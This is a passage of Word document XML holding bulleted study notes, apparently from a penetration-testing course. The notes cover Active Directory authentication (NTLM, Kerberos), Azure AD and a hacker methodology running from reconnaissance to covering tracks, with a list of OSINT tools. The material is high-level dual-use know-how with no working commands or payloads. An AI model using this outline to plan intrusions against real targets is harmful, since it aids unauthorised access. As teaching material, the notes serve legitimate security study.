    <w:p w14:paraId="1AC9A3CF" w14:textId="20D8E0F4" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Critical and vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AA89D" w14:textId="37F43949" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Two Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46894A" w14:textId="75EFCC54" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7EB532" w14:textId="77882A1F" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default Windows authentication protocol using an encrypted challenge/response protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BB531" w14:textId="3DC4F028" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00CE3454" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473E02FA" w14:textId="17918178" w:rsidR="00CE3454" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default authentication service for AD using ticket-granting tickets and service tickets to authenticate users and give users access to other resources across domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44209D61" w14:textId="4AE364CB" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Main access point for attackers and contain some of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>must</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> vulnerable protocols for AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E9325" w14:textId="23BA00C2" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active Directory in the Cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBD6BD" w14:textId="0FDC0595" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Azure AD – default settings are more secure than an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>on-premise</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> physical AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CEE905" w14:textId="5148F54B" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Still has some vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F71BFA" w14:textId="128E7C60" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Azure AD Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4621D3" w14:textId="20875888" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Middleman between AD and users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C27C9" w14:textId="42B3C6A8" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Secure transaction between domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D90416" w14:textId="00BD3105" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Renders many attacks ineffective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E32A7" w14:textId="0CB51823" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cloud Security Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B9BCF" w14:textId="1D85A75B" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rest APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B722175" w14:textId="5E23924F" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OAuth/SAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B0B91E" w14:textId="77D91B0E" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OpenID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFE0F2" w14:textId="74980582" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Flat Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07184DB5" w14:textId="673EA7E8" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tenants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BC5E3F" w14:textId="5D996805" w:rsidR="00C3057A" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Guests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C44BFD" w14:textId="42971D19" w:rsidR="00C45792" w:rsidRPr="0084205E" w:rsidRDefault="00C3057A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lab Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A44145C" w14:textId="61FA3C55" w:rsidR="00C45792" w:rsidRPr="0084205E" w:rsidRDefault="00C45792" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E986AF" w14:textId="34E0C071" w:rsidR="00C45792" w:rsidRPr="0084205E" w:rsidRDefault="00C45792" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39003A42" w14:textId="5B6E058D" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Hacker Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7E0E5" w14:textId="437BF209" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Methodology Outline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05012A4D" w14:textId="5B4CC278" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD5B7F" w14:textId="2D4714A3" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF7DDE" w14:textId="3A33E753" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration/Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E2DDF" w14:textId="60C969F0" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F20CBB" w14:textId="58B04AE0" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35699C" w14:textId="28F057B0" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760D108" w14:textId="5FC0635A" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B05E9D" w14:textId="7006FDC2" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reconnaissance Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57420079" w14:textId="2B3AFBE5" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Collecting information about the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE401C" w14:textId="4B0C520E" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Usually requires no interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4C9D0" w14:textId="76E07853" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Google Dorking Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C74F58D" w14:textId="68C2BFA3" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wikipedia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC3F6F2" w14:textId="662A359F" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Peoplefinder.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57EFCC" w14:textId="6CB36752" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Who.is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398FB1B2" w14:textId="6CE2DEFF" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691D5F2" w14:textId="62E71CEF" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hunter.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DEDBD" w14:textId="69B4E4E5" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Builtwith.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE1BBA" w14:textId="2137A679" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B42218C" w14:textId="6EFA3005" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Publicly available tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F111546" w14:textId="0A68C9F4" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration and Scanning Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71185614" w14:textId="06F0E407" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Second Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62688E3F" w14:textId="6758F1AC" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Beginning of interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C4154" w14:textId="7BE297E7" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>More specialized tools</w:t>
      </w:r>
    </w:p>
